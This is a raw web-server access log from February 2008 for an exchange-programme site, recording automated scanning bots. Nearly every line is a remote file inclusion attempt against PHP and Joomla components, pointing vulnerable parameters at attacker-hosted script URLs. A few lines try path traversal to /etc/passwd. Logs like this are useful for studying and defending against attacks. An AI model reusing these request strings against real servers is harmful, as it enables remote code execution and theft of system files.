209.31.183.74 - - [25/Feb/2008:04:20:02 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:20:03 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:20:03 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.29.0.28 - - [25/Feb/2008:04:20:19 -0800] "GET //content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
200.29.0.28 - - [25/Feb/2008:04:20:20 -0800] "GET /logs//content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
82.35.84.213 - - [25/Feb/2008:04:20:38 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.232.156.10 - - [25/Feb/2008:04:21:18 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:21:19 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:21:20 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:21:20 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.143.142.163 - - [25/Feb/2008:04:21:38 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.143.142.163 - - [25/Feb/2008:04:21:39 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.143.142.163 - - [25/Feb/2008:04:21:39 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.214.93.154 - - [25/Feb/2008:04:22:12 -0800] "GET /logs/access_080204.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.93.154 - - [25/Feb/2008:04:22:12 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:22:16 -0800] "GET /logs/access.log//oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:22:17 -0800] "GET /logs/access.log/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
65.98.100.202 - - [25/Feb/2008:04:22:32 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.214.93.154 - - [25/Feb/2008:04:22:33 -0800] "GET /logs/access_080127.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
65.98.100.202 - - [25/Feb/2008:04:22:34 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
65.98.100.202 - - [25/Feb/2008:04:22:37 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
91.192.194.37 - - [25/Feb/2008:04:22:47 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.55.164.143 - - [25/Feb/2008:04:23:15 -0800] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=http://img.mehriz.org/image/img/86b932fa9ed6cadc7bb3766f57f03a2b/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.55.164.143 - - [25/Feb/2008:04:23:16 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://img.mehriz.org/image/img/86b932fa9ed6cadc7bb3766f57f03a2b/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.133.173 - - [25/Feb/2008:04:23:35 -0800] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.195.58.180 - - [25/Feb/2008:04:23:45 -0800] "GET /logs/access_080114.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
202.143.142.163 - - [25/Feb/2008:04:23:59 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.143.142.163 - - [25/Feb/2008:04:23:59 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.143.142.163 - - [25/Feb/2008:04:24:00 -0800] "GET /logs/%3Cwbr%20//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.119.158.50 - - [25/Feb/2008:04:24:31 -0800] "GET /logs/access_071231.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
85.119.158.50 - - [25/Feb/2008:04:24:31 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
85.119.158.50 - - [25/Feb/2008:04:24:31 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
62.105.75.32 - - [25/Feb/2008:04:24:43 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.105.75.32 - - [25/Feb/2008:04:24:44 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.105.75.32 - - [25/Feb/2008:04:24:44 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.86.84.203 - - [25/Feb/2008:04:24:47 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.86.84.203 - - [25/Feb/2008:04:24:47 -0800] "GET /logs/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 3941 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.234.116.170 - - [25/Feb/2008:04:24:53 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.toulouseangloexchange.com"
211.234.116.170 - - [25/Feb/2008:04:24:53 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
83.172.144.57 - - [25/Feb/2008:04:25:06 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.172.144.57 - - [25/Feb/2008:04:25:07 -0800] "GET /logs/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 3941 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.172.144.57 - - [25/Feb/2008:04:25:07 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.172.144.57 - - [25/Feb/2008:04:25:09 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.172.144.57 - - [25/Feb/2008:04:25:09 -0800] "GET /logs/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 3941 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.172.144.57 - - [25/Feb/2008:04:25:09 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
91.192.194.37 - - [25/Feb/2008:04:25:23 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.119.158.50 - - [25/Feb/2008:04:25:26 -0800] "GET /logs/access_071217.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
62.75.252.59 - - [25/Feb/2008:04:25:28 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
62.75.252.59 - - [25/Feb/2008:04:25:30 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
72.55.164.143 - - [25/Feb/2008:04:26:01 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://img.mehriz.org/image/img/86b932fa9ed6cadc7bb3766f57f03a2b/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:04:26:05 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:04:26:05 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.86.84.203 - - [25/Feb/2008:04:26:12 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
63.246.64.173 - - [25/Feb/2008:04:26:37 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
63.246.64.173 - - [25/Feb/2008:04:26:39 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
85.69.204.208 - - [25/Feb/2008:04:26:39 -0800] "GET /logs/access_080127.loghttp://cccryuan1918ssdf.nightmail.ru/babyboy? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
200.29.0.28 - - [25/Feb/2008:04:26:42 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.toulouseangloexchange.com"
200.29.0.28 - - [25/Feb/2008:04:26:42 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
82.112.124.79 - - [25/Feb/2008:04:26:46 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
202.143.142.163 - - [25/Feb/2008:04:26:46 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
82.112.124.79 - - [25/Feb/2008:04:26:47 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:27:12 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:27:28 -0800] "GET /logs/access_071112.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:27:28 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:27:28 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:04:27:35 -0800] "GET /logs/access_080204.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:04:27:36 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:04:27:37 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:28:02 -0800] "GET //update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:28:02 -0800] "GET /logs//update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:04:28:04 -0800] "GET /?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:04:28:04 -0800] "GET /logs/?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 200 3941 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:28:06 -0800] "GET /logs/access_071126.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.74.120.24 - - [25/Feb/2008:04:28:40 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:04:29:23 -0800] "GET /logs/access_080127.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.12.50.119 - - [25/Feb/2008:04:30:12 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
85.12.50.119 - - [25/Feb/2008:04:30:12 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
211.234.116.170 - - [25/Feb/2008:04:30:23 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
211.234.116.170 - - [25/Feb/2008:04:30:23 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:30:32 -0800] "GET /logs/access_071126.log//newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:30:32 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:30:32 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:04:30:54 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:04:30:56 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:31:21 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:31:42 -0800] "GET /logs/access_071231.log/newsletter/newsletter.php?waroot=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:31:42 -0800] "GET /newsletter/newsletter.php?waroot=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:31:42 -0800] "GET /logs/newsletter/newsletter.php?waroot=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:04:31:52 -0800] "GET /?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 200 919 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:04:31:52 -0800] "GET /?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 200 919 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.112.124.79 - - [25/Feb/2008:04:32:00 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
82.112.124.79 - - [25/Feb/2008:04:32:01 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:32:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:32:14 -0800] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:32:28 -0800] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:32:28 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
